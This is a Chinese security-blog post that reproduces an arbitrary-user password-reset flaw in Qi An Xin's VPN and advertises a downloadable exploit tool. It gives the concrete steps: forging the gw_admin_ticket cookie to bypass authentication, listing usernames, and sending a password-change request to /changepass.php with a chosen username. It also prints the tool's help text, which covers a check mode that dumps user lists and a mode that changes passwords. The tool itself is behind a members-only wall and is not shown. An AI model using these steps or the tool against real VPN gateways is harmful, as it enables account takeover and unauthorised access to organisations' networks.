探索网络安全新技术
攀登黑客技术最高峰

奇安信VPN任意用户密码重置漏洞复现(含利用工具)

漏洞复现

使用cookie editor插件添加cookie值gw_admin_ticket为1

奇安信VPN任意用户密码重置漏洞复现(含利用工具)-威武网安

用charset插件修改网页编码为utf-8使页面正常显示

获取到用户名信息

使用hackbar对地址/changepass.php?type=2发送修改密码数据,并将cookie值修改为如下,this_name为你需要修改密码的用户名称

返回修改密码成功.可能会提示密码强度不够可以尝试随机生成字符串来生成

利用工具

工具参数

./VPN_linux_amd64 -h                                 
Usage of VPN_linux_amd64:
  -c    check target vuln.(default) (default true)
  -e    change user's password.
  -p string
        manual set password you want change.(default is generate by random.) (default "BpLnfgDsc3WD")
  -t int
        request timeout default is 5 second. (default 5)
  -u string
        target you want fuck.(example:https://xxxxx:xxx)

参数介绍

参数 含义
c 检测模块,默认启用,存在漏洞的话会输出目标的用户列表.
e 修改密码模块,默认不启用.
p 更改后的密码,默认随机生成.
t 请求超时时间,默认为5s.
u 需要检测的目标url地址,.

工具下载

温馨提示:本内容仅威武会员可见!【 加入会员
赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《奇安信VPN任意用户密码重置漏洞复现(含利用工具)》
文章链接:https://www.wevul.com/1421.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册